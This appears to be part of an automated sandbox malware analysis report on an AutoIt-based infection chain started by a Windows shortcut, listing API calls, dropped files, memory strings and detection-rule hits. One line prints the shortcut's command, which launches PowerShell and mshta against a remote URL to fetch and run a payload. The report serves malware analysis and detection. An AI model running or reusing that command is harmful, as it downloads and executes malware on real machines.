Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D40D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00007FF656D40D24
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D40D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00007FF656D40D24
Source: C:\Users\Public\Guard.exeCode function: 30_2_003C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,30_2_003C4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B54830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,35_2_00B54830
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D40A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00007FF656D40A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D27E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,19_2_00007FF656D27E64
Source: C:\Users\Public\Guard.exeCode function: 30_2_003DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,30_2_003DD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B6D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,35_2_00B6D164

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 612, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000008.00000002.2347436380.000001BE20956000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_47cccfa9-6
Source: powershell.exe, 00000008.00000002.2347436380.000001BE20956000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_69dfa4a0-6
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: This is a third-party compiled AutoIt script.19_2_00007FF656CB37B0
Source: PefjSkkhb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 00000013.00000000.2298099515.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9229b854-b
Source: PefjSkkhb.exe, 00000013.00000000.2298099515.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_8a843c09-5
Source: PefjSkkhb.exe.8.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c7f3f1ad-7
Source: PefjSkkhb.exe.8.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_4426581c-d
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: R4qP4YM0QX.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BF80: CreateFileW,DeviceIoControl,CloseHandle,19_2_00007FF656D2BF80
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,19_2_00007FF656D1D2C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00007FF656D2D750
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,30_2_003B5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B45778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,35_2_00B45778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD32CD420E8_2_00007FFD32CD420E
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D4F63019_2_00007FF656D4F630
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D617C019_2_00007FF656D617C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE175019_2_00007FF656CE1750
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CC58D019_2_00007FF656CC58D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CDF8D019_2_00007FF656CDF8D0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2D87C19_2_00007FF656D2D87C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF184019_2_00007FF656CF1840
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB183C19_2_00007FF656CB183C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE95B019_2_00007FF656CE95B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D456A019_2_00007FF656D456A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CBB39019_2_00007FF656CBB390
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D432AC19_2_00007FF656D432AC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF529C19_2_00007FF656CF529C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB5F3C19_2_00007FF656CB5F3C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CDC13019_2_00007FF656CDC130
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D4206C19_2_00007FF656D4206C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CDBEB419_2_00007FF656CDBEB4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CBBE7019_2_00007FF656CBBE70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CC3C2019_2_00007FF656CC3C20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D31A1819_2_00007FF656D31A18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5BA0C19_2_00007FF656D5BA0C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CBB9F019_2_00007FF656CBB9F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE793C19_2_00007FF656CE793C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5DB1819_2_00007FF656D5DB18
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CCFA4F19_2_00007FF656CCFA4F
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF67F019_2_00007FF656CF67F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEA8A019_2_00007FF656CEA8A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5A59C19_2_00007FF656D5A59C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5055C19_2_00007FF656D5055C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5C6D419_2_00007FF656D5C6D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF240019_2_00007FF656CF2400
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CDC3FC19_2_00007FF656CDC3FC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D383D419_2_00007FF656D383D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D4836019_2_00007FF656D48360
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD451419_2_00007FF656CD4514
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE84C019_2_00007FF656CE84C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D4632019_2_00007FF656D46320
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD02C419_2_00007FF656CD02C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CE30DC19_2_00007FF656CE30DC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CC2E3019_2_00007FF656CC2E30
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF6DE419_2_00007FF656CF6DE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD0E9019_2_00007FF656CD0E90
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D5CE8C19_2_00007FF656D5CE8C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CC0E7019_2_00007FF656CC0E70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D46C3419_2_00007FF656D46C34
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2D2019_2_00007FF656CF2D20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D50AEC19_2_00007FF656D50AEC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB2AE019_2_00007FF656CB2AE0
Source: C:\Users\Public\Guard.exeCode function: 30_2_0035B02030_2_0035B020
Source: C:\Users\Public\Guard.exeCode function: 30_2_003594E030_2_003594E0
Source: C:\Users\Public\Guard.exeCode function: 30_2_00359C8030_2_00359C80
Source: C:\Users\Public\Guard.exeCode function: 30_2_003723F530_2_003723F5
Source: C:\Users\Public\Guard.exeCode function: 30_2_003D840030_2_003D8400
Source: C:\Users\Public\Guard.exeCode function: 30_2_0038650230_2_00386502
Source: C:\Users\Public\Guard.exeCode function: 30_2_0038265E30_2_0038265E
Source: C:\Users\Public\Guard.exeCode function: 30_2_0035E6F030_2_0035E6F0
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037282A30_2_0037282A
Source: C:\Users\Public\Guard.exeCode function: 30_2_003889BF30_2_003889BF
Source: C:\Users\Public\Guard.exeCode function: 30_2_003D0A3A30_2_003D0A3A
Source: C:\Users\Public\Guard.exeCode function: 30_2_00386A7430_2_00386A74
Source: C:\Users\Public\Guard.exeCode function: 30_2_00360BE030_2_00360BE0
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037CD5130_2_0037CD51
Source: C:\Users\Public\Guard.exeCode function: 30_2_003AEDB230_2_003AEDB2
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B8E4430_2_003B8E44
Source: C:\Users\Public\Guard.exeCode function: 30_2_003D0EB730_2_003D0EB7
Source: C:\Users\Public\Guard.exeCode function: 30_2_00386FE630_2_00386FE6
Source: C:\Users\Public\Guard.exeCode function: 30_2_003733B730_2_003733B7
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037F40930_2_0037F409
Source: C:\Users\Public\Guard.exeCode function: 30_2_0036D45D30_2_0036D45D
Source: C:\Users\Public\Guard.exeCode function: 30_2_0036F62830_2_0036F628
Source: C:\Users\Public\Guard.exeCode function: 30_2_0035166330_2_00351663
Source: C:\Users\Public\Guard.exeCode function: 30_2_003716B430_2_003716B4
Source: C:\Users\Public\Guard.exeCode function: 30_2_0035F6A030_2_0035F6A0
Source: C:\Users\Public\Guard.exeCode function: 30_2_003778C330_2_003778C3
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037DBA530_2_0037DBA5
Source: C:\Users\Public\Guard.exeCode function: 30_2_00371BA830_2_00371BA8
Source: C:\Users\Public\Guard.exeCode function: 30_2_00389CE530_2_00389CE5
Source: C:\Users\Public\Guard.exeCode function: 30_2_0036DD2830_2_0036DD28
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037BFD630_2_0037BFD6
Source: C:\Users\Public\Guard.exeCode function: 30_2_00371FC030_2_00371FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AEB02035_2_00AEB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AE94E035_2_00AE94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AE9C8035_2_00AE9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B023F535_2_00B023F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B6840035_2_00B68400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B1650235_2_00B16502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AEE6F035_2_00AEE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B1265E35_2_00B1265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0282A35_2_00B0282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B189BF35_2_00B189BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B60A3A35_2_00B60A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B16A7435_2_00B16A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AF0BE035_2_00AF0BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B3EDB235_2_00B3EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0CD5135_2_00B0CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B60EB735_2_00B60EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B48E4435_2_00B48E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B16FE635_2_00B16FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B033B735_2_00B033B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0F40935_2_00B0F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AFD45D35_2_00AFD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B016B435_2_00B016B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AEF6A035_2_00AEF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AFF62835_2_00AFF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AE166335_2_00AE1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B078C335_2_00B078C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0DBA535_2_00B0DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B01BA835_2_00B01BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B19CE535_2_00B19CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AFDD2835_2_00AFDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0BFD635_2_00B0BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B01FC035_2_00B01FC0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: String function: 00007FF656CD8D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00361A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00370D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00378B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00AF1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00B00D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00B08B30 appears 42 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3052Jump to behavior
Source: Process Memory Space: powershell.exe PID: 612, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@75/255@13/10
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D33778 GetLastError,FormatMessageW,19_2_00007FF656D33778
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00007FF656D1D5CC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1CCE0 AdjustTokenPrivileges,CloseHandle,19_2_00007FF656D1CCE0
Source: C:\Users\Public\Guard.exeCode function: 30_2_003A8DE9 AdjustTokenPrivileges,CloseHandle,30_2_003A8DE9
Source: C:\Users\Public\Guard.exeCode function: 30_2_003A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,30_2_003A9399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B38DE9 AdjustTokenPrivileges,CloseHandle,35_2_00B38DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B39399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,35_2_00B39399
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D357B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,19_2_00007FF656D357B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,19_2_00007FF656D2BE00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D35F2C CoInitialize,CoCreateInstance,CoUninitialize,19_2_00007FF656D35F2C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,19_2_00007FF656CB6580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]Jump to behavior
